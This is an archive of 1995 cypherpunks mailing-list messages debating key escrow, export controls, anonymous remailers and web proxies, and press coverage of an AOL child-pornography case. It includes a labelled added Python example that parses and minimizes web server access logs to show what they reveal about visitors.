Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Potocki <potock@cig.mot.com>
Date: Thu, 14 Sep 95 09:38:41 PDT
To: cypherpunks@toad.com
Subject: MIME Security Issues
Message-ID: <199509141641.MAA11889@po_box.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody wish to express any comments regarding MIME security?  I
have read the RFCs and any/all docs I could find on this issue.  I
understand what the security risks are, but I have been unsuccessful in
my attempts to find info regarding what is being done, or has been done
to correct this.  If I remember correctly, I think I once saw a brief
mention of filters or something.

I am new to this stuff, so any assistance would be greatly appreciated.

Thank you,
Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 11:47:24 PDT
To: cme@TIS.COM
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <9509141843.AA21226@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a couple of comments, one on a question and one on an answer.

> 
> >Q: Aren't LEAs worried that strong encryption will make it more
> >difficult for them to catch crooks?

If this is for non-cypherpunks, you should say what an LEA is.  They wouldn't
understand your question.  (Shoot, some cypherpunks are probably going, "Huh?")

> 
> >Q: What's this 'key escrow' thing? 
> >
> >A: Some government agencies have been trying to figure out methods which
> >simultaneously permit US citizens to use strong cryptography against
> >criminal eavesdroppers, while retaining the ease with which LEAs can
> >currently tap your calls. The schemes generally involve something
> >mistitled 'key escrow', in which copies of cryptographic keys would be
> >stored at sites accessible by LEAs.
> 
> 'key escrow' is a code word for government access to the unencrypted
> message.  It is a persistent theme, dating back to the NSA's CCEP in about


You probably need to say what the NSA is, and certainly have to identify CCEP.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden)
Date: Thu, 14 Sep 95 02:58:03 PDT
To: frissell@panix.com
Subject: Re: Software vs Money Laundering
In-Reply-To: <frissell@panix.com>
Message-ID: <9509140957.AA03082@mpii02024.ag2.mpi-sb.mpg.de>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell's email (Sep 13 17:52:55), in reply to John Young, gives
some problems regarding an AI screening program for detecting illicit
electronic money transfers:

> Not the least of which [problems] is that money launderers can use "AI
> Software" to generate a stream of real and dummy money transfers that
> emulates "normal" money transfers.  Not to mention the fact that
> monopoly money transfer networks that can be surveilled by the Feds
> (FEDWIRE and SWIFT) are not long for this world.  They will be
> replaced by encrypted, open, net-based systems.

There are also more basic problems.  An essential initial stage in the
development of such AI programs, a kind of expert system, is the
analysis of the behaviour of the human "experts". In this case the
experts being the wily money launderers. The program can then,
allegedly, spot all those trademark traits of the money launderer and
nab him/her.  Trouble is, the program therefore represents a kind of
blue-print of what the aspiring money launderer should *not* do when
making illicit electronic money transfers. Any "expert system" that
operates by recognizing, and acting upon, human behaviour (regardless
of whether or not that be on the net) can be foiled by altering, or
disguising, that behaviour (the "dummy money transfers" mentioned by
DCF would be one way of duping the system).  Of course, the officials
at law will claim rousing successes and cite numerous convictions --
but as with the drug trade, that will only be the tip of the ice-berg
with no real clues as to the size of the base. The tip of the ice-berg
will simply be what the AI program has succeeded in formally "capturing".

Pete


=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.       Fax: (49) (681) 302-5401





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 14 Sep 95 09:12:58 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: NSA on GAK
In-Reply-To: <9509141525.AA21098@cantina.verity.com>
Message-ID: <199509141601.MAA06167@calloway.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| 
|           Senate Subcommittee on Technology and the Law
|  Hearing on the Administration's Key Escrow Encryption Standard
| 
|         Written Questions for Vice Admiral McConnell, NSA

| *Questions from Senator Murray:
| 
| Q:    In my office in the Hart building this February, I downloaded
| from the Internet an Austrian program that uses DES encryption.
[...]

| With at least 20 million people hooked up to the
| Internet, how do U.S. export controls actually prevent criminals,
| terrorists, or whoever from obtaining DES encryption software?
| 
| Answer:  Serious users of encryption do not entrust their
| security to software distributed via networks or bulletin boards.
| There is simply too much risk that viruses, Trojan Horses,
| programming errors, and other security flaws may exist in such
| software which could not be detected by the user.  Serious users of
| encryption, those who depend on encryption to protect valuable data
| and cannot afford to take such chances, instead turn to other
| sources in which they can have greater confidence.  Such serious
| users include not only entities which may threaten U.S. national
| security interests, but also businesses and other major consumers
| of encryption products.  Encryption software distribution via
| Internet, bulletin board, or modem does not undermine the
| effectiveness of encryption export controls.   

	"Help me understand here.  You say that serious users of
encryption don't use software distributed via network.  In that case,
you would have no objection to PGP being exported, as serious users of
encryption don't use it?"










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 14 Sep 95 12:18:11 PDT
To: mark@unicorn.com (Rev. Mark Grant)
Subject: Re: An opportunity not to be missed
In-Reply-To: <Pine.3.89.9509141521.A20169-0100000@unicorn.com>
Message-ID: <199509141913.MAA08819@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	How did they get the logs? Did they have a court order?
And web logs only show the site things come from, not the username things
are coming from.

	If someone wants to set something up on c2.org, you're quite
welcome to. Check out http://www.c2.org (currently under
renovation.. my graphic designer is on vacation so I'm awaiting his
return before we can revamp the graphics, basically.)

	The ecash problem, of course, is a problem.

> 
> On Thu, 14 Sep 1995, Frank Stuart wrote:
> 
> > Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> > use through the remailers)?  You could set up a web-page with instructions
> > and a list of crimes for which there are rewards.
> 
> Someone already tried that. The cops got a copy of the WWW logs and 
> started investigating everyone who'd looked at the WWW page... So at the 
> least you'd need a bunch of anonymous WWW proxies as well.
> 
> There's also the problem that the current ecash systems do not provide 
> payee anonymity, so if you pay informers with ecash they can be traced if 
> the bank and payer collude.
> 
> 		Mark
> 


-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Thu, 14 Sep 95 09:25:16 PDT
To: cypherpunks@toad.com
Subject: Crimestoppers anon tip mailbox
Message-ID: <199509141625.MAA08120@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
>> use through the remailers)?  You could set up a web-page with instructions
>> and a list of crimes for which there are rewards.
>
>Someone already tried that. The cops got a copy of the WWW logs and 
>started investigating everyone who'd looked at the WWW page...

Right - this was an abduction case in Florida, if memory serves.

> So at the 
>least you'd need a bunch of anonymous WWW proxies as well.

I don't see that as a problem.  I'm about to set up at least one of these
myself, and I believe that there are others around - please correct me
if I'm wrong.

In any case, there needn't be a web page to do the actual reporting.
There can be web pages to advertise, and then a simple maildrop for
the tips.  You could even arrange that the maildrop send everything
to a remailer for delivery to a non-advertised address for an extra
layer of protection (in case someone forgot to use a remailer to send
the tip in the first place, or they screwed up in a way that revealed
their identity).


David C. Lambert
dcl@panix.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 14 Sep 95 12:32:24 PDT
To: mnorton@cavern.uark.edu
Subject: Re: GAK
Message-ID: <9509141935.AA09315@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>So would an FBI camcorder in every room of every house.
>The question is where to draw the line, and I'd rather
>let the lines draw themselves, as opposed to having 
>citizens be compelled to draw them.  The telephone
>system, Mr. Freeh's preferred analog, is inherently
>susceptible to tapping, but what if it were not, and
>every telephone were required to be equipped with
>a government tap switch, subject to warrant, of course?
 
While not every telephone, every telephone switch is required
to be tap capable  - The Digital Telephony Act.  Note there is
provision for the government to pay costs for Telcos to make 
their phones tappable - as yet unfunded by Congress.

The rights of The People have clearly collided with the interests
of Law Enforcement.  Guess who Congress likes better?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 09:42:30 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <Pine.LNX.3.91.950914075351.4971A-100000@on-ramp.ior.com>
Message-ID: <9509141640.AA30602@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Today's Washington Post (9/14) has a front page article on a bust of
>> 12 computer using pedophiles.
>> NBC news is saying that Janet Reno will have a news conference
>> later this morning.
>> Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
>> will be held.
>> Coincidence?

><g> I think not.. Kind of like the coincidence that just before any gun 
>law votes, some maniac goes on a shooting spree.. ;)

Nope, it's more likely to be because of the telecommunications bill and the Exon
amendment. They are demonstrating the sufficiency of existing laws.

We never used to see kiddie porn on the internet. The net would go ballistic if a
picture of a teen age nude was posted. Recently there has been a flood of hard 
core paedophile material.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 14 Sep 95 10:53:17 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Child Porn, Morphing, and Pointers
In-Reply-To: <ac7db05202021004bc61@[205.199.118.202]>
Message-ID: <9509141753.AA02480@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
 > Keith Henson, amongst others, has long suggested that a good test case will
 > be the _morphing_ of legal images to make them look like child porn.

And of course the subsequent test case on a software product that
automatically morphs a .JPG of a 32-year-old model into an image of an
eight-year-old.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 14 Sep 95 09:59:17 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Alice's Remailer site (was:Re: Digital Fingerprinting)
Message-ID: <9509141659.AA28685@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: patrick@Verity.COM (Patrick Horgan)
> > From: Mac Norton <mnorton@cavern.uark.edu>
> > To: Patrick Horgan <patrick@Verity.COM>
> > On Wed, 13 Sep 1995, Patrick Horgan wrote:

> > > > > Then, in W.Ky., as in Stockbridge, "You can get
> > > > > anything you want..."? :)
> > > Why do I feel like I'm sitting on the group W bench?
> > I don't know, kid, what you in for?
> Encryption.  And they all moved away from me on the group W bench there,
> talking mean hairy eyeballs and all sorts of things until I said, and
> annoying the NSA, and they all moved back, talking about crime, PEM, PGP,
> and liberty and justice for all;)
> Patrick

I've seen various 'Alice's Restaurant' pastiches, Alice's NNTP server, Alice's
MIT GUI, etc. I guess it's time to try to do one for crypto....

This song is called Alice's Remailer site and it's about Alice, and the
remailer site, but Alice's Remailer site is not the name of the Remailer
site, it's the name of the song, and that's why I called this song Alice's
Remailer site.
 
        You can send anything you want through Alice's Remailer site.
        You can send anything you want through Alice's Remailer site.
        Connect right in it's around the back.
        Halfway down that seventeen inch rack.
        You can be anyone you want through Alice's Remailer site.

etc....




 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 14 Sep 95 13:18:14 PDT
To: cypherpunks@toad.com, gnu
Subject: Corrections to "Ron Plesser's take on NIST GAK"
Message-ID: <9509142018.AA04536@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


There were a few sentences truncated in what I posted yesterday, due
to mistakes on my part.  Here are the corrections.

	John

...
The Administration policy for 40-bit-key encryption will continue
as-is, and no keys will have to be escrowed for such systems.  Mr.
Nelson said that the government's main concern is that strong
encryption products not be available in the mass market.

...
bi-lateral agreements with friendly nations.  In a presentation, Bob
Holleyman of the Business Software Alliance criticized the
Administration's failure to "liberalize export controls on generally
available software employing non-key escrow encryption."  Also, he
stated that the Administration's proposal and the draft criteria
"continue to reflect a misunderstanding of the market place and, if
implemented in anything like their current form, will prevent key
escrow encryption from ever being commercially adopted."  Mr.
Holleyman recommended a number of features for a marketable system,
including a variety of encryption algorithms using at least 64-bit
keys and user specification of a key holder.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Thu, 14 Sep 95 11:45:11 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Alice's Remailer site
In-Reply-To: <9509141659.AA28685@toad.com>
Message-ID: <199509141752.NAA12989@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



     More noise. Sorry, but I can't resist:

"Peter Trei" <trei@process.com> writes:
>This song is called Alice's Remailer site and it's about Alice, and the
>remailer site, but Alice's Remailer site is not the name of the Remailer
>site, it's the name of the song, and that's why I called this song Alice's
>Remailer site.
> 
>        You can send anything you want through Alice's Remailer site.
>        You can send anything you want through Alice's Remailer site.
>        Connect right in it's around the back.
>        Halfway down that seventeen inch rack.
>        You can be anyone you want through Alice's Remailer site.

(with apologies to Arlo...)

You know, if one person, just one person, uses that remailer, they may
think he's just paranoid, and they'll ignore him.

And if two people, two people, do it -- in reply to each other--they may
think they're both crooks but they won't be able to bust either of
them. And if THREE people do it.  Three -- Can you imagine three people
loggin' in, sending mail through Alice's Remailer site and loggin' out?
They may think it's an ORGANIZATION!

And can you imagine FIFTY people a day?  I said FIFTY people a day --
loggin' in, sending mail through Alice's Remailer site and loggin' out?
And friends, they may think it's a MOVEMENT, and that's what it is:

      THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!--

and all you gotta do to join is to flip the bird to those traffic-sniffin'
spooks out there -- With feelin' ...


-Tom Swiss / tms@tis.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 10:55:48 PDT
To: cypherpunks@toad.com
Subject: Annonymous Web proxies.
Message-ID: <9509141754.AA30799@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



There has been a lot of debate about setting up of anonymous Web proxies. There
are many thousand already deployed. Any Web proxy which does not keep logs is
effectively an anonymous Web proxy.

Just download the CERN server and run it.

http://www.w3.org/hypertext/WWW/Daemon/Status.html


The point about monitoring such sites is an apt one. I work under the assumption
that I am monitored because if I was a spook I would be monitoring me. Most of
the discoveries of security holes arrive at my door sooner rather than later. I
would have monitored the communist party for the same reason, it was one of the
most obvious places for the soviets to attempt infiltration, the other being
the authoritarian establishment right.

	Phill
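
Added example (not part of the original message and not code from the CERN server): what the holder of a web server access log in the NCSA/CERN-style Common Log Format can reconstruct about who read a page, and what remains once the identifying fields are dropped, as a proxy that keeps no per-client record would leave it. The sample lines, host names and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Common Log Format: host ident authuser [date] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<authuser>\S+) '
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample log (reserved .example host names, not real traffic).
SAMPLE_LOG = '''\
dialup-17.isp.example - - [14/Sep/1995:09:12:58 -0700] "GET /tips/index.html HTTP/1.0" 200 2048
ws4.lab.univ.example - - [14/Sep/1995:09:14:02 -0700] "GET /tips/rewards.html HTTP/1.0" 200 5120
dialup-17.isp.example - - [14/Sep/1995:09:15:40 -0700] "GET /tips/rewards.html HTTP/1.0" 200 5120
proxy.cache.example - - [14/Sep/1995:09:20:11 -0700] "GET /tips/index.html HTTP/1.0" 200 2048
ws4.lab.univ.example - jdoe [14/Sep/1995:09:21:30 -0700] "GET /members/ HTTP/1.0" 200 1024
'''


def parse(line):
    """Return the CLF fields of one log line as a dict, or None if malformed."""
    m = CLF.match(line.strip())
    return m.groupdict() if m else None


def visitors_of(log_text, path_prefix):
    """List what a log holder learns about readers of a path.

    Returns {host: [usernames]}. The username list is empty unless the
    request was authenticated, which matches the point made in the thread:
    the log names the originating site, not the person.
    """
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        parts = rec["request"].split()
        if len(parts) >= 2 and parts[1].startswith(path_prefix):
            seen[rec["host"]].add(rec["authuser"])
    return {h: sorted(u for u in users if u != "-")
            for h, users in seen.items()}


def minimized(log_text):
    """Rewrite the log without host, ident or authuser, and with the
    timestamp coarsened to the day, keeping only what is needed for
    traffic statistics."""
    out = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        day = rec["time"].split(":", 1)[0]
        out.append('- - - [%s] "%s" %s %s'
                   % (day, rec["request"], rec["status"], rec["size"]))
    return "\n".join(out)


if __name__ == "__main__":
    # The full log yields a list of sites that looked at the page. A client
    # that came through proxy.cache.example shows up only as the proxy, so
    # whether that reader can be traced depends on the proxy's own log.
    for host, users in sorted(visitors_of(SAMPLE_LOG, "/tips/").items()):
        print(host, users)
    # After minimization every reader collapses into the same "-" entry.
    print(visitors_of(minimized(SAMPLE_LOG), "/tips/"))
```
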



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Sep 95 10:57:10 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: NSA on GAK
Message-ID: <199509141755.NAA23065@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 9/14/95 -0400, Adam Shostack wrote:
>
>	"Help me understand here.  You say that serious users of
>encryption don't use software distributed via network.  In that case,
>you would have no objection to PGP being exported, as serious users of
>encryption don't use it?"

Were that true, then they wouldn't be on the Internet either because the
Internet runs on software distributed over the Internet.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 14 Sep 95 11:03:49 PDT
To: Richard Potocki <potock@cig.mot.com>
Subject: Re: MIME Security Issues
In-Reply-To: <199509141641.MAA11889@po_box.cig.mot.com>
Message-ID: <199509141803.OAA20674@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard Potocki writes:
> Does anybody wish to express any comments regarding MIME security?

You are looking for the MOSS specifications. They are fairly obvious
in the way they work.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 11:38:59 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: AOL Porno
In-Reply-To: <Pine.SUN.3.91.950914051946.8806B-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950914142830.1918F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Duncan Frissell wrote:

> Will the federal prosecutors and Fibbies on this list please 
> emphasize that the Internet was not involved in the AOL kiddie porn 
> case.  The Internet has enough opportunities for bad publicity as 
> it is.
> 
> DCF
> 
> "Who wonders:  How it is that CompuServe was able to exist from 1979 
> to the arrival of Prodigy and AOL without major sex, and drugs, and 
> rock and roll problems?"
> 

I would be happy to, but no member of the media has asked me.  I'm 
available for photo ops too!  :-) (for the humor impaired)

I am blasting the Rimm "study" in the next issue of the Federal Lawyer.  
Does that count?  

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 11:29:46 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950914054153.8806C-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950914143225.1918G-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Duncan Frissell wrote:

> 
> 
> On Wed, 13 Sep 1995, Black Unicorn wrote:
> 
> > But won't clients insist on proper credentials in one form or another?  
> > Doesn't the practicality and accountability of a centralized authority 
> > (or several authorities) provide the best answer to this?  Who is going 
> > to accept my signature promising that I did indeed get a law degree and 
> > pass the bar?
> 
> An educational institution can certify its own graduates --- it does 
> now.  Competing credentialing institutions is exactly what I would be 
> looking for as opposed to today's coercive monopoly.  
> 
> No matter how skilled, it is illegal for an unlicensed person to practice 
> law, medicine, or many other professions in any state.  The nets weaken 
> these restrictions because they allow action at a distance.
>
That's certainly true.  But what about liability insurance?  That's one 
of the key aspects of my retention of a professional.  Being cynical, and 
somewhat knowledgeable about human error, I want to be sure there's 
someone to turn to if the advice/treatment/whatever turns out not only to 
be wrong in hindsight, but in foresight.

Having taken, and passed, bar exams in three states (3 for 3 for those of 
you thinking I was forum shopping), I can tell you that they weren't that 
big of a barrier.  You can flunk (over several tries) by failing to 
prepare at all, panicking, being an extremely poor test taker, or, well ...
 
> Note the other effects of the nets.  They make it hard to tell that you 
> *are* working which reduces the impact of regulations of work by 
> "illegal aliens."  Thus if I am wandering through the South of France 
> while writing the 'Great American Novel' I am unlikely to get busted for 
> violation of work restrictions.  The nets expand the number of jobs I 
> can do while innocently wandering the South of France.  I can or will 
> soon be able, for example, to manage a large international corporation 
> from anywhere.
> 
> DCF
> 
> "Who actually prefers Le Massif Central to those hot and crowded southern 
> climes." 
> 
Just wondering about liability issues after state accrediting is dead.

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Thu, 14 Sep 95 11:43:05 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
Message-ID: <199509141842.OAA22090@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


September 13, 1995
                                
               PRESS BRIEFING BY MIKE MCCURRY

[Snip]                                
        
MR. MCCURRY:  ... [The President]'ll be making some fairly
significant news on Thursday.  So he'll be very busy next
week.
        
Q    News?  What kind of news?
        
Q    News on what?
        
MR. MCCURRY:  You'll see next week.
        
[Snip]
        
Q    What about Thursday --
        
Q    Are you going?
        
MR. MCCURRY:  Half and half, I think.  I'll go -- I think
there are some days that look more political; I don't think
it's necessary for me to be there.
        
Q    What will be the general topic on Thursday?
        
MR. MCCURRY:  On Thursday?  Technology.

[Snip to end]

URL: http://docs.whitehouse.gov/white-house-publications/
1995/09/1995-09-13-press-briefing-by-mike-mccurry.text

----------

Any scuttlebutt that computer security, the Internet or
encryption are the "technology?"

Or related to the NYT spin today on LEA-web-snooping:

   "We are not going to permit exciting new technology to be
   misused to exploit and injure children," Attorney General
   Janet Reno said today in announcing the arrests.

   The culmination of the inquiry by the Federal Bureau of
   Investigation comes at a time when the agency has needed
   some favorable attention to offset a string of incidents
   that have cast it in a negative light. Its officials have
   come under fire for their role in the siege at Waco, Tex.,
   the standoff with a white separatist in Idaho and, most
   recently, over an attempt to cover up aspects in the Idaho
   incident.

Or diversion from the allegations of Special Agent Whitehurst
that Feeb lab rats and bosses are corrupt -- tar-morphing even
Golden Boy Freeh.

Pray that kid-loving Reno HRTs the abusive brats.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 12:08:42 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA on GAK
In-Reply-To: <199509141755.NAA23065@panix.com>
Message-ID: <Pine.D-G.3.91.950914150100.1918J-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Duncan Frissell wrote:

> At 12:01 PM 9/14/95 -0400, Adam Shostack wrote:
> >
> >	"Help me understand here.  You say that serious users of
> >encryption don't use software distributed via network.  In that case,
> >you would have no objection to PGP being exported, as serious users of
> >encryption don't use it?"
> 
> Were that true, then they wouldn't be on the Internet either because the
> Internet runs on software distributed over the Internet.
> 
And that's what we call double jeopardy.  Not allowed by the Constitution!


> DCF
> 
> 
EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 14 Sep 95 14:58:20 PDT
To: mix-l@jpunix.com
Subject: Mixmaster status changing
Message-ID: <199509142157.OAA10304@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I recently promised to release the next version of Mixmaster (V 2.0.2)
within 48 hours. The situation has changed. The release of the next
version of Mixmaster will be indefinitely delayed.

There has been an offer to purchase and commercially develop Mixmaster.
This will hasten the development of Mixmaster for other platforms (e.g.
DOS, Windows, Macintosh), and bring significant improvements to the
interface, but I will not compromise on the level of security provided by
Mixmaster. Free client software will continue to be available.

This could be the big breakthrough for remailers, finally thrusting them
out of the hobbyist's closet into the corporate world. We have all known
that remailers would not become widely used by the rest of the world until
they were easy to use. Many corporations also fear freeware because of its
unknown provenance and its lack of support.

I apologize for the delay, but I think that the wait will be worth it. 

   -Lance M. Cottrell <loki@obscura.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

-- 
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 15:08:17 PDT
To: tms@TIS.COM
Subject: Re: [NOISE] Alice's Remailer site
Message-ID: <9509142204.AA22141@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> And can you imagine FIFTY people a day?  I said FIFTY people a day --
> loggin' in, sending mail through Alice's Remailer site and loggin' out?
> And friends, they may think it's a MOVEMENT, and that's what it is:
> 
>       THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!--
> 
> and all you gotta do to join is to flip the bird to those traffic-sniffin'
> spooks out there -- With feelin' ...
> 
> 
> -Tom Swiss / tms@tis.com
> 


There sure are a lot of us old fogies around here:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 14 Sep 95 15:15:16 PDT
To: cypherpunks@toad.com
Subject: Re: AOL Porno
Message-ID: <199509142214.PAA07197@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 AM 9/14/95 -0400, you wrote:
>Will the federal prosecutors and Fibbies on this list please 
>emphasize that the Internet was not involved in the AOL kiddie porn 
>case.  The Internet has enough opportunities for bad publicity as 
>it is.

I watched the local news coverage of that case.  The report was given by an
individual who has made that mistake before.  (He hosts a "Town Hall"
program that exploits various subjects of the day.  He was corrected as to
"AOL not being the Internet" during one of them.  I know, I was the one who
corrected him.)  The coverage showed lots of shots of the various internet
binaries echos (including alt.binaries.pictures.erotica.children, but not
alt.binaries.pictures.cops.), the web including the Penthouse site (as if
Penthouse has kiddy porn), and other unrelated and non-AOL pictures.

The Internet has become the new scapegoat of choice.  The general media
cannot (or is unwilling to) distinguish the difference between electronic
nets.  The Internet is a generic term for them and since when is the media
willing to look beyond the surface?

How does this connect to crypto?  Well, aiding and abetting in a scapegoat
is a capital crime in this country.  You can be assured that the Department
of Scapegoat Management will link kiddy porn and crypto at some point in the
minds of the generic public. Hopefully that perception can be "headed off at
the pass".  Having cryptography as a means of avoiding crime and criminals
in the perception of the public is a good idea.  The question is how to get
that perception into the minds of the general public before the other meme
can be implanted by Scapegoat management and the other TLAs?

>"Who wonders:  How it is that CompuServe was able to exist from 1979 
>to the arrival of Prodigy and AOL without major sex, and drugs, and 
>rock and roll problems?"

I think the six-dot-three filenames have something to do with it...

|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
